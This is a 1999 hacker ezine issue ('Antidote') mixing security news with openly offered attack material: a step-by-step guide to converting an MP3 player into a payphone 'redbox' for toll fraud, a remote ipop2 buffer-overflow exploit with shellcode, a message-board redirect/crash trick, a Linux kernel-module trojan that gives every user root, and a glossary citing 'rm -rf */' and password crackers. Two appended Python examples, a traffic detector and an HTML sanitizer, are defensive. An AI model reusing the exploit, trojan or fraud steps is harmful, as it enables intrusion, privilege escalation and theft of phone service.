Volume 2 Issue 10
6/28/99

http://www.thepoison.org/antidote

bof_ptr = (long *)buffer;
for (i = 0; i < bufsize - 4; i += 4)
    *(bof_ptr++) = get_sp() - offs;
printf ("Creating termcap f1le\n");
printf ("b1tch is Fe3lyn 1t.\n");

------------------------------

In this issue of Antidote, we have over 690 subscribers and are getting more every day! The only thing that we ask of you when you read Antidote is that you go to:

www.thepoison.org/popup.html

and click on our sponsors. One issue of Antidote takes us about a week to put together, and going to our sponsor only takes you about 15 seconds (if that). So please go visit our sponsor, because it is the only thing we ask of you.

--=\\Contents\\=--

0.0 - Beginning
    0.01 - What?
    0.02 - FAQ
    0.03 - Authors
    0.04 - Shouts
    0.05 - Writing
1.00 - News
    1.01 - Rio RedBox
    1.02 - MicroScared goes Ape Shit for Privacy
    1.03 - Crypto bill Passed
    1.04 - Hacked site Alleges Media Conspiracy
    1.05 - Congress Warned of Hacker Threats
    1.06 - GSA launches intrusion-detection net
2.00 - Exploits (new & older)
    2.01 - subipop2d.c.txt
    2.02 - wwwboard.bof.txt
    2.03 - all-root.c.txt
3.00 - Misc
    3.01 - Neophyte Vocab

SAY.W - SAY WHAT? Various quotes that might be humorous, stupid, true, or just plain making fun of something or someone.
FEAT.S - FEATURED SITES:
    www.thepoison.org/hosting
    www.403-security.org
    www.hackernews.com

------------------------------

**************************************************
http://www.thepoison.org/hosting
Low affordable pricing starting at $10!
**************************************************

0.01 --=\\What?\\=--

What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause that would be wrong. We don't claim to be a hacking magazine. All Antidote is, is basically current news and happenings in the underground world. We aren't going to teach you how to hack or anything, but we will supply you with the current information and exploits. Mainly Antidote is just a magazine for people to read if they have some extra time on their hands and are bored with nothing to do. If you want to read a magazine that teaches you how to hack etc, then you might want to go to your local bookstore and see if they carry '2600'.

------------------------------

0.02 --=\\FAQ\\=--

Here are a lot of questions that we seem to receive a lot, or our "Frequently Asked Questions". Please read this before e-mailing us with questions and if the question isn't on here or doesn't make sense, then you can e-mail us with your question.

> What exactly is "Antidote"?

See section 0.01 for a complete description.

> I find Antidote to not be shot for the beginner or does not teach you the basics, why is that?

Antidote is for everyone, all we are basically is a news ezine that comes out once a week with the current news, exploits, flaws and even programming. All of the articles that are in here are received second hand (sent to us) and we very rarely edit anyone's articles.
> I just found Antidote issues on your webpage, is there anyway I can get them sent to me through e-mail?

Yes, if you go to www.thepoison.org/antidote there should be a text box where you can input your e-mail address. You will receive a link to the current Antidote (where you can view it).

> If I want to submit something, are there any 'rules'?

Please see section 0.03 for a complete description.

> If I submitted something, can I remain anonymous?

Yes. Just make sure that you specify what information about yourself you would like to be published above your article (when sending it to us) and we will do what you say.

> I submitted something and I didn't see it in the current/last issue, why is that?

It could be that someone else wrote something similar to what you wrote and they sent it to us first. If you sent us something and we didn't e-mail you back, then you might want to send it again because we probably didn't get it (we respond to all e-mails no matter what). We might use your article in future issues of Antidote.

> Can I submit something that I didn't "discover" or "write"?

Yes you can, we take information that is written by anyone regardless if you wrote it or not.

Well that's it for our FAQ. If you have a question that is not on here or the question is on here and you had trouble understanding it, then please feel free to e-mail lordoak@thepoison.org and he will answer your question. This FAQ will probably be updated every month.

------------------------------

0.03 --=\\Authors\\=--

Lord Oak is the founder and current president of Antidote. Most work is done by him. Please feel free to e-mail him at: lordoak@thepoison.org

Duece is the co-founder and co-president of Antidote, some work is done by him when he comes online. Feel free to e-mail him at: duece@thepoison.org

ox1dation not really an author, just someone that helps us out a lot and we consider him as an author!
His e-mail address is: ox1dation@thepoison.org

------------------------------

0.04 --=\\Shouts\\=--

These are just some shout outs that we feel we owe to some people. Some are individuals and some are groups in general. If you are not on this list and you feel that for some reason you should be, then please contact Lord Oak and he will post you on here and we are sorry for the misunderstanding.

Well, here are the shout outs:

Lord Oak EazyMoney Duece opt1mus oX1dation PBBSER Forlorn Retribution 0dnek www.thepoison.org

Like we said above, if we forgot you and/or you think you should be added, please e-mail lordoak@thepoison.org and he will be sure to add you.

------------------------------

0.05 --=\\Writing\\=--

As many of you know, we are always open to articles/submittings. We will take almost anything that has to do with computer security. This leaves you open for:

-Protecting the system (security/securing)
-Attacking the system (hacking, exploits, flaws, etc....)
-UNIX (really anything to do with it...)
-News that has to do with any of the above....

The only thing that we really don't take is webpage hacks, like e-mailing us and saying "www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine. If you have any questions about what is "acceptable" and not, please feel free to e-mail Lord Oak [lordoak@thepoison.org] with your question and he will answer it.

Also, please note that if we receive two e-mails with the same topic/idea then we will use the one that we received first. So it might be a good idea to e-mail one of us and ask us if someone has written about/on this topic so that way you don't waste your time on writing something that won't be published. An example of this would be:

If Joe sends me an e-mail with the topic being on hacking hotmail accounts on Thursday. And then Bill sends us an e-mail on hacking hotmail accounts on Sunday, we will take Joe's article because he sent it in first.
But keep in mind, we might use your article for the next issue! If you have something that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or duece@thepoison.org and one of us will review the article and put it in Antidote (if we like it).

------------------------------

http://www.403-security.org
For the latest hacks and news

1.01 --=\\RIO Redbox\\=--

The construction, possession, and/or operation of this device may be a criminal offence. Don't do it. This information is presented because it is common and readily available. This article is based on a Canadian Perspective, with some US info, but the procedures are Canadian.

Purpose:

If you are one of the MP3 lovers out there that own a Diamond RIO (gotta love these things), you can easily convert them to a nice Redbox for free calls and as a replacement for that damned annoying HOLD MUSIC!

How-to:

1. Get a hold of a Diamond RIO PMP300, easy enough if you've got the money. (They ain't cheap, but they are worth it just for the mp3 part.)

2. Get the tones. In Canada you need to generate Canadian N-ACTS tones, and in the US you need to use American ACTS tones. Use a program like Cool Edit (http://www.syntrillium.com) to generate the tones. Here are the tones you need to make:

N-ACTS (Canadian):
    Nickel  - 2200hz 0.06s on
    Dime    - 2200hz 0.06s on, 0.06s off, twice repeating
    Quarter - 2200hz 33ms on, 33ms off, 5 times repeating

ACTS (American):
    Nickel  - 1700+2200hz 0.060s on
    Dime    - 1700+2200hz 0.060s on, 0.060s off, twice repeating
    Quarter - 1700+2200hz 33ms on, 33ms off, 5 times repeating

(5 times, as in "on, off, on, off, on, off, on, off, on")

3. Convert the tones to Mp3's.
At this time, the most lean and clean program I've found is the FhG Mpeg Layer-3 Producer from Opticom (http://www.opticom.de/) it allows you to encode any Windows PCM wav file. Encode the tones at the highest rate you can, usually 128kBits/s and 44,100Hz Stereo. This limits any distortion that the encoding may cause (anything lower and the tones are useless). They take less than a second to encode on a decent processor.

4. Load the RIO. Use whatever software you use to load your RIO up. Make sure you remember which track was which coin.

5. Outputting the tones. This is pretty much open for you to do yourselves. You just need a speaker with a high enough fidelity and a decent output. A prefab speaker from radio shack can work, or you can modify a PC speaker or something with a Mini-din connector to hook into the RIO. The choice is up to you. I found that a prefab, 2", battery amplified portable speaker works quite well, and doesn't look too conspicuous if you're searched. Just a jumble of wires and speakers McGyvered together.

6. Using your Rio Redbox.

Long distance

1. Dial a long distance number.
2. You will be connected with an electronic or human operator telling you how much money to deposit. Insert $.05, Hold the RIOBox speaker up to the phone's mouthpiece and play the required number of tones. Don't be afraid of putting in a few cents worth extra, redboxing doesn't need exact change.
3. When more money is required play more tones into the mouthpiece.

Local Calls

1. Dial information or an operator and ask them to place your call for you. If they ask why, come up with a unique excuse.
2. She will ask for money. Insert 5 cents first and then use your RIOBox. This prevents the operator from "seeing" that you are using a RIOBox. This may or may not be necessary. Experiment.

International Calls

1. Dial an international phone number.
2. An operator will ask for money. Insert 5 cents first and then use your RIOBox.
This prevents the operator from "seeing" that you are using a RIOBox. This may or may not be necessary. Experiment.
3. When more money is required play more tones into the mouthpiece.

Notes and suggestions:

A suggestion is to insert a second of silence before and after the tone so you have time to hit the stop button so the RIO doesn't blow through all the tones in 2 seconds. This also gives you a chance to randomize the "coins" you're inserting, so as not to alert any powers that be.

Another would be to pickup a small 2-4 Meg smartmedia card for storing these. That way you can keep the tones hidden, but easily accessible. Plus the card can be destroyed quickly in case of trouble and you'll be left with a nice (legal) RIO.

You may also want to mix (with random time between coins) preset amounts, like $2.50 or $3.95 and have them on a separate track for convenience sake, especially if you know before hand how much it's gonna cost.

For more info on redboxing in Canada, check out cyb0rg/asm's article @ www.hackcanada.com, much of this article was "borrowed" from his article.

Copyright (c) 1999 RenderMan
http://www.hackcanada.com

------------------------------

1.02 --=\\MicroScared goes Ape Shit for Privacy\\=--

[www.techserver.com]

Microsoft Corp., the largest advertiser on the Internet, has decided it will not buy ads next year on Web sites that fail to publish adequate privacy promises to consumers.

The announcement comes less than three months after a similar decision by IBM, the Web's second-largest advertiser. The actions by the two companies come as the Federal Trade Commission prepares its recommendations to Congress on whether tough new federal privacy laws are needed to protect consumers online.

The Microsoft announcement to be made Wednesday was expected at a computer conference in New York and will take effect after the end of the year.
Microsoft said it spent about $30 million last year on Web ads - but that's still a small portion of the $2 billion spent last year on Web advertising, according to the Internet Advertising Bureau.

Microsoft, which has lobbied with other industry groups against privacy laws legislation, earlier this year began offering a free digital tool kit that promises to allow consumers to use next-generation software to restrict what personal details Web sites collect about them.

Consumers typically must manually find a company's online privacy statement, if one exists, and read through legalese to determine what personal information a Web site might be harvesting, such as their name, e-mail address or even favorite authors or clothing sizes.

Last month, an industry-financed study showed businesses have made dramatic improvements since last year in warning people how companies use personal information collected about them.

Nearly two-thirds of commercial Internet sites displayed at least some warning that businesses were collecting personal details from visitors, such as names, postal and e-mail addresses, and even shopping tastes, the study found.

But less than 10 percent of those sites had what experts consider comprehensive privacy policies. A similar study last summer by the FTC found only 14 percent of sites warned how companies used private information they collected about customers.

http://www.techserver.com/story/body/0,1634,62850-99839-710835-0,00.html

------------------------------

1.03 --=\\Crypto bill Passed\\=--

[www.wired.com]

A bill to relax strict US export limits on computer data-scrambling technology moved ahead in the Senate Wednesday, but still faces several hurdles, including White House opposition.

The Senate Commerce Committee's approval of S798, the Promote Reliable On-Line Transactions to Encourage Commerce and Trade Act (PROTECT), marked a victory for technology companies.
The panel favored a far more restrictive approach two years ago, but reversed course after a powerful lobbying campaign by the industry.

Scrambling or encryption technology, which is included in everything from cable television control boxes to email and Web browsing software, has become a critical means of securing global communications and electronic commerce over the Internet.

http://www.wired.com/news/news/politics/story/20383.html

------------------------------

1.04 --=\\Hacked site Alleges Media Conspiracy\\=--

[www.7am.com]

Although repaired and back online within just a few short hours, the Thanks-CGI website appears to have been hit a second time by the "Hackers In Paradise" group.

This time the group appear happy to have simply changed the scrolling javascript banner at the bottom of the page to read "HiP Welcomes you to THANKS-CGI.... We're trying to make your site more secure for the world!"

The operator of the website has told 7am.com that they are currently testing for holes in their CGI scripts. They have suggested that the security hole may not be the fault of their scripts -- rather that it could have been a "misconfiguration between cgi script and the server."

7am.com discovered the hack while researching another story on CGI resources and contacted the site's operator by email immediately the problem was noticed. However, the operator of the Thanks-CGI site has suggested that because "the arrival of your e-mail was paced so closely with the occurence [sic] of the hackage ... we have strong reason to believe there might be a relationship between 7am.com and the hacker who hacked our site."
http://7am.com/cgi-bin/twires.cgi?1000_t99062202.htm

------------------------------

1.05 --=\\Congress warned of hacker threats\\=--

[www.usatoday.com]

Government Web sites and computer networks are increasingly vulnerable to "cyber attacks'' because they lack trained personnel and don't follow security plans, federal officials warned a congressional committee Thursday.

Few people have adequate training to defend government Web sites, and those who do seldom work in government for long, three panelists told the House Science Committee's subcommittee on technology.

The security agencies "train people at government expense and the private sector waves a bigger paycheck and takes them away,'' said Keith Rhodes, technical director with the General Accounting Office.

In addition, government security experts often find their advice isn't followed, said Raymond Kammer, director of the National Institutes for Standards and Technology, which recommends security measures for federal computers.

"It is imperative that federal agencies implement vigorous security programs,'' Rhodes said.

Hacker attacks like the recent defacing of the Senate Web site are well documented, but information about attempts to access sensitive intelligence information is "very sketchy,'' said Michael Jacobs, a deputy director of the National Security Agency. Hackers are often nearly impossible to trace unless they boast of their actions.

In the most common type of attack, hackers overwhelm Web sites with a flood of requests for information, causing the site to slow or shut down. Hackers can also redirect visitors to a fake Web site that appears to be the official site, as happened earlier this month to the Senate site.

"We are clearly seeing an escalation in both the destructive nature and aggressive pace of these and other attacks,'' Jacobs said.
http://www.usatoday.com/life/cyber/tech/ctf465.htm

------------------------------

1.06 --=\\GSA launches intrusion-detection net\\=--

[www.fcw.com]

The General Services Administration last week asked industry for information about emerging security technology for detecting unauthorized users on agency networks, with the goal of building a government intrusion-detection system by the end of next year.

In building the Federal Intrusion Detection Network (Fidnet), GSA hopes to find security tools vendors are developing that overcome the weaknesses of existing technology. By keeping ahead of the latest technology, GSA hopes to leave agency defenses less vulnerable to hackers, agency officials said.

"We want to encourage people to develop new technologies that will help us keep neck and neck with the perpetrator," said David Jarrell, program manager for the GSA portion of Fidnet in the Federal Technology Service's Office of Information Security and technical director of the Federal Computer Incident Response Capability.

OIS will look not only to established intrusion-detection vendors but to new companies and people that "we haven't even heard of," Jarrell said. "I think there are people out there that are significantly brilliant enough to solve this and we hope that this [request for information] will cause them to come forward," he said.

GSA plans to use the vendor-provided information to develop prototypes by the first quarter of fiscal 2000, said Tom Burke, GSA's assistant commissioner of information security. Down the line, OIS may even pay some of the vendors to put together a long-term, real-world demonstration of their capabilities at an agency, he said.

GSA particularly is interested in finding intrusion-detection systems that are more capable of detecting attacks as they happen instead of after the fact.
The problem is that most intrusion-detection solutions work the same way anti-virus protection does: They check network-use patterns against a known list of intrusion "signatures" and send out alerts when they come across a match. But as vendors and users have known for years, this method will not catch intrusions that are not on that list. Also, most products just now are advancing to the point where they alert administrators at the time an intrusion takes place.

"We find that many of the off-the-shelf products that are available today are really a response to the intrusions, and they are always a step behind the intruder," Jarrell said. "We want to look to the future and some artificial intelligence that will learn as it goes about the attacks that are being launched."

This type of capability would be more than welcome to agencies, especially if they are enabled to respond more quickly at the local level, said one senior civilian agency official.

Others recognized the potential benefits of sharing attack "experience" across government. "What I would hope this next-generation intrusion detection could bring to us is the capability not only to monitor [intrusions] but to put together the information in a history for reference," said Sarah Jane League, Defense Department liaison at the Critical Infrastructure Assurance Office. "It should bring that pattern recognition and learn as it goes...so that over time it will have the ability to recognize" not only attacks but what could be attacks, she said.

Vendors have been working on this type of product, sometimes called anomaly detection, for some time. "ISS has a lot of research efforts in place to advance the intrusion-detection market," said Mark Wood, intrusion-detection product manager at Internet Security Systems Inc., maker of the Real-Secure intrusion-detection product line. "Having a pre-defined list of signatures is nice, but you'd like to detect novel attacks, things you don't know about."
One major problem vendors are struggling with in producing this type of solution is the large number of "false positives" -- incorrectly perceived attacks -- that are generated when a network is scanned, Wood said. Despite this, a commercially viable solution could be available within the next year, he said.

"It's certainly worthwhile that someone like the GSA is driving this; it's absolutely necessary," Wood said. "Perhaps this will help coordinate the industry so that they will provide something sooner than they would have."

The need for this type of solution across government has been underscored by the more than 40 federal World Wide Web sites that have been hacked in the last two months, including at least six last week. And these attacks are only the most noticeable types of intrusions into government networks, according to federal experts testifying before Congress last week [see related story, "House member suggests regular network security reports"].

However, in the end, while many would wish otherwise, keeping up with attackers instead of one step behind really is the best that anyone can do, Jarrell said. "There is no silver bullet; there is no perfect solution when it comes to intrusion detection," he said. "As I've said before, if you build a better mousetrap, a better mouse will evolve."

http://www.fcw.com/pubs/fcw/1999/0628/fcw-newsintrusion-6-28-99.html

------------------------------

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
#!/usr/bin/perl
# Lord Oak's famous Perl script.
#
# minor configuring is needed!
#
##################################

# path to the frequently asked questions....
$faq = "/home/username/faq.html";

##### Do not edit anything else! #####

print "Content-type: text/html\n\n";
open(FAQ,"<$faq");
print FAQ "Question: who runs this place?\n";
print FAQ "\n";
print FAQ "Answer: Donno, but Lord Oak 0wnz it\n";
close (FAQ);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

2.01 --=\\subipop2d.c.txt\\=--

/*
 * subipop2d.c (c) 1999 Subterrain Security
 *
 * Written by bind - June 18, 1999
 *
 * Vulnerable: ipop2 daemons shipped with the imap-4.4 package
 * Compromise: remote users can spawn a shell as user "nobody"
 *
 * Greets: vacuum, xdr & cripto...
 *
 * Usage:
 * ./subipop2 [offset] [alignment] [timeout]
 *
 * Try offsets -500...500, alignment option should be between 0 and 3
 *
 */

#include
#include
#include

#define RET 0xbffff718
#define NOP 0x90
#define WAIT 20

char shellcode[] = /* shellcode "borrowed" from plaguez's imapx.c */
"\xeb\x38\x5e\x89\xf3\x89\xd8\x80\x46\x01\x20\x80\x46\x02\x20\x80"
"\x46\x03\x20\x80\x46\x05\x20\x80\x46\x06\x20\x89\xf7\x83\xc7\x07"
"\x31\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
"\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc3\xff\xff\xff\x2f"
"\x42\x49\x4e\x2f\x53\x48\x00";

int
main (int argc, char **argv)
{
  char buf[1002], *auth, *user, *pass;
  int i, offset = 0, align = 0, timeout = WAIT;
  unsigned long addr;

  if (argc < 4)
    {
      printf ("usage: %s [offset] [alignment]"
              " [timeout]\n", argv[0]);
      exit (1);
    }

  auth = argv[1];
  user = argv[2];
  pass = argv[3];

  if (argc > 4) offset = atoi (argv[4]);
  if (argc > 5) align = atoi (argv[5]);
  if (argc > 6) timeout = atoi (argv[6]);

  addr = RET - offset;

  memset (buf, NOP, 1002);
  memcpy (buf + 500, shellcode, strlen (shellcode));

  for (i = (strlen (shellcode) + (600 + align)); i <= 1002; i += 4)
    *(long *) &buf[i] = addr;

  sleep (2);
  printf ("HELO %s:%s %s\n", auth, user, pass);

  sleep (timeout);
  printf ("FOLD %s\n", buf);
}

------------------------------

2.02 --=\\wwwboard.bof.txt\\=--

As we all know, there are many problems with Matt Wright's wwwboard (www.worldwidemart.com/scripts). Even though there are many errors in it, it is still one of the most commonly used boards today. I have found yet another glitch with his wwwboard.
What it will do is kick someone that views your message off of Internet Explorer 4.0+. I will take no credit in the JavaScript writing because I did not write it, I just discovered that it could be used with his board. Input this in the message area:

Kicking.............

It is a buffer overflow done in javascript. I found it on a webpage somewhere and I do not remember where so I am very sorry to the person that wrote it that I cannot list your name here cause I found this a while ago. Sometimes this kicker doesn't work. But we know that his board supports HTML so you can input this script that will redirect the person to another page containing the script. Input this into the message area:

Redirecting.....

The kicker is located at the page so when the user wants to read your post, it will redirect them to that page which contains that JavaScript code. I would recommend just putting that refresh tag instead of the JavaScript tag cause the Matt Wright wwwboard comes with JavaScript turned off or as the default. So the refresh would work better and would have more of a chance of it to work.

This doesn't just work with Matt Wright's wwwboards, but really any wwwboards that support HTML. It is just that I tested and figured out how this worked on a Matt Wright wwwboard. This is also a good trick if you have a sponsor that pays by the click, just redirect them to your sponsor....
Lord Oak
lordoak@thepoison.org

------------------------------

2.03 --=\\all-root.c.txt\\=--

/*
 * A kernel trojan (basic linux kernel module)
 *
 * Description: gives all users root
 *
 * coded by fred_ | blasphemy
 *
 * Compile: gcc -c -O3 all-root.c
 * Load: insmod all-root.o
 * Unload: rmmod all-root
 *
 * email: cornoil@netscape.net
 */

#define MODULE
#define __KERNEL__

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

extern void *sys_call_table[];

int (*orig_getuid)();

int give_root()
{
    int x;
    if (current->uid != 0) {
        current->uid = 0;
        current->gid = 0;
        current->euid = 0;
        current->egid = 0;
    }
    return 0;
}

int init_module(void)
{
    orig_getuid = sys_call_table[SYS_getuid];
    sys_call_table[SYS_getuid] = give_root;
    return 0;
}

void cleanup_module(void)
{
    sys_call_table[SYS_getuid] = orig_getuid;
}

------------------------------

3.01 --=\\Neophyte Vocab\\=--

Here is a list of vocab that I made up for the newbies. You should probably learn this if you are taking into consideration of being a 'computer h4x0r'. This is probably where you should start and the first thing you should learn before anything else. I put them in alphabetical order (finally learned how to do that!)

*Words & Descriptions:

31337 - see elite.
box - basically the OS or your computer.
buffer overflow - tries to 'overflow' some part of a server (see exploit & server).
dns - domain name server. Changes xx.xx.xxx.x to yourdomain.com (brief description).
dos - denial of service; something to slow a computer down (see nuke & ping).
computer - a television set with buttons and a rodent attached to it.
elite - the best at something who can make no mistakes at that something.
exploit - a security hole (in a server, web browser, anything).
ftp - file transfer protocol. Used to transfer files (upload and/or download).
ftpd - ftp daemon (see ftp server & ftp).
ftp server - a server used to allows people to ftp to it (see ftp).
http - hypertext transfer protocol. Allows you to view the persons webpage.
httpd - http daemon (see http & http server).
http server - a server that allows people to surf/view your site.
lamer - someone that tries to understand hacking and doesn't.
linux - an operating system that is like a "sub-operating system" of unix (see unix).
local exploit - an exploit that only works on 127.0.0.1 or "local host" (see exploit).
nuke - sends large packets to a computer causing a dos (see dos).
passwd - where all of the usernames and passwords are stored on a unix box (see unix).
passwd cracker - program used for cracking passwd files (see passwd & wordlist).
ping - sends 'x' number of packets to a computer and sees how fast they get there.
port scanner - program used for scanning various ports on a computer (see computer).
remote exploit - an exploit that can be used on any IP (see exploit).
rm -rf */ - unix command to delete everything on the server (see unix).
root - the username to a unix box. The person that has super user privileges.
script kiddie - someone that uses other peoples exploits or that weren't made by them.
server - where you go when you type in a site URL and upload to a site (basic descrip.)
shell account - a user account on a unix box (see unix).
unix - the operating system that MOST servers are run on (see server).
warez - giving away or re-selling already used copyrighted material.
windowsNT - another operating system that a lot of servers run on (see server).
wordlist - file w/ generated words, for cracking passwd files (see passwd cracking).

*Sayings & Descriptions:

I like your computer - means he likes your rodent/rat.
I got root - means someone gained root on a server.
I got a shell account - means someone got a user account on a unix server/computer.
I used the IMAPD exploit - means that he used the IMAPD security glitch to gain access.
Ok I hope you're starting to understand the 'sayings' and how to understand the vocab when they are put into sentences.

*Programs & misc:

passwd cracking - John the Ripper, pass crack
port scanner - 7th Sphere port scanner, Hackers Utility
wordlist generators - Dictionary Generator v1.0 (dic-gen), passlist
shell accounts - www.cyberspace.org, www.shellyeah.com, www.freeshells.net

All of these programs can be found on my site (www.thepoison.org), and a lot more of them. These are just some of the programs that I use when I am in windows and too lazy to reboot into RH5.2 (RedHat 5.2).

Lord Oak
lordoak@thepoison.org

------------------------------

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Quote #3-

"I needed the DOS prog so I could impress my NY Times slut..."
-JayPee
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Antidote is an HNN Affiliate
http://www.hackernews.com

*ALL* ASCII art in this issue is done by Lord Oak [lordoak@thepoison.prg] and permission is needed before using.
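
Added example for section 2.01 (not part of the original issue and not code from the exploit's author or the imap package): the client side of that session is a HELO line followed by a FOLD whose argument is about a thousand bytes of mostly 0x90 filler, which a monitor can flag in captured POP2 client traffic. The verb list is from RFC 937; the thresholds, function names and the sample session are assumptions constructed for illustration.

```python
"""Flag POP2 client lines shaped like the oversized FOLD request in 2.01.

Constructed triage example: feed it the client-to-server lines of one
session (from a packet capture or a proxy log) and it reports which lines
look like an overflow attempt and why.
"""

# POP2 client commands defined in RFC 937.
POP2_VERBS = {b"HELO", b"FOLD", b"READ", b"RETR",
              b"ACKS", b"ACKD", b"NACK", b"QUIT"}

MAX_ARG_LEN = 256   # assumption: no legitimate argument is longer than this
MAX_RUN = 32        # assumption: longest tolerated run of one repeated byte


def longest_run(data):
    """Length of the longest run of a single repeated byte value."""
    best = run = 0
    prev = None
    for byte in data:
        run = run + 1 if byte == prev else 1
        prev = byte
        best = max(best, run)
    return best


def inspect_line(line):
    """Return the reasons one client line looks hostile (empty list = ok)."""
    line = line.rstrip(b"\r\n")
    verb, _, arg = line.partition(b" ")
    reasons = []
    if verb.upper() not in POP2_VERBS:
        reasons.append("unknown-verb")
    if len(arg) > MAX_ARG_LEN:
        reasons.append("oversized-argument")
    # Mailbox names and credentials are printable text; padding and
    # machine code are not.
    if any(byte < 0x20 or byte > 0x7E for byte in arg):
        reasons.append("non-printable-bytes")
    if longest_run(arg) > MAX_RUN:
        reasons.append("long-repeated-byte-run")
    return reasons


def scan_session(client_lines):
    """Return [(line_number, verb, reasons)] for every suspicious line."""
    findings = []
    for number, line in enumerate(client_lines, start=1):
        reasons = inspect_line(line)
        if reasons:
            verb = line.split(b" ", 1)[0].strip()[:8].decode("ascii", "replace")
            findings.append((number, verb, reasons))
    return findings


# Constructed sample session. The last line only imitates the size and
# filler byte of the request in 2.01; it carries no payload.
SAMPLE_SESSION = [
    b"HELO mailhost:alice secret\r\n",
    b"FOLD inbox\r\n",
    b"READ 1\r\n",
    b"FOLD " + b"\x90" * 1002 + b"\r\n",
]

if __name__ == "__main__":
    for number, verb, reasons in scan_session(SAMPLE_SESSION):
        print(f"line {number}: {verb}: {', '.join(reasons)}")
```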
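
Added example for section 2.02 (not part of the original issue and not wwwboard's own code, which is Perl): both tricks there depend on the board writing a post's HTML to the page unchanged, so the fix is to sanitize each message on the server before it is stored or displayed. The allowlist of tags, the class and function names and the sample posts are assumptions made for this sketch.

```python
"""Allowlist sanitizer for message-board posts (constructed example).

Only a few formatting tags survive, always without attributes. Script and
style elements are dropped together with their content, every other tag
(meta, iframe, img, a, ...) is removed, and plain text is HTML-escaped.
"""
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"b", "i", "u", "em", "strong", "p", "br", "pre", "blockquote"}
VOID_TAGS = {"br"}                  # allowed tags that take no closing tag
DROP_CONTENT = {"script", "style"}  # their text must never reach the page


class PostSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []          # pieces of sanitized output
        self.open_tags = []    # allowed tags currently open
        self.skip_depth = 0    # > 0 while inside <script> or <style>
        self.rejected = []     # names of tags that were neutralised

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip_depth += 1
            self.rejected.append(tag)
        elif self.skip_depth:
            return
        elif tag in ALLOWED_TAGS:
            # Attributes are dropped on purpose: no onclick=, style=, href=.
            self.out.append(f"<{tag}>")
            if tag not in VOID_TAGS:
                self.open_tags.append(tag)
        else:
            self.rejected.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
        elif not self.skip_depth and tag in self.open_tags:
            # Close back to the matching open tag so output stays balanced.
            while self.open_tags:
                closing = self.open_tags.pop()
                self.out.append(f"</{closing}>")
                if closing == tag:
                    break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=True))

    def result(self):
        self.close()                      # flush text still buffered
        while self.open_tags:             # close anything left open
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize_post(body):
    """Return (safe_html, rejected_tag_names) for one submitted message."""
    parser = PostSanitizer()
    parser.feed(body)
    return parser.result(), parser.rejected


# Constructed sample posts; example.invalid is a placeholder host.
SAMPLE_POSTS = [
    "<b>hello</b> <script>while(1){}</script>world",
    '<meta http-equiv="refresh" content="0; url=http://example.invalid/">'
    "Redirecting.....",
    '<p onmouseover="x()">hi</p>',
]

if __name__ == "__main__":
    for post in SAMPLE_POSTS:
        safe, rejected = sanitize_post(post)
        print(repr(safe), "rejected:", rejected)
```

A non-empty rejected list is also a useful moderation signal: a post that tried to carry script or meta tags can be logged or held for review instead of being published silently.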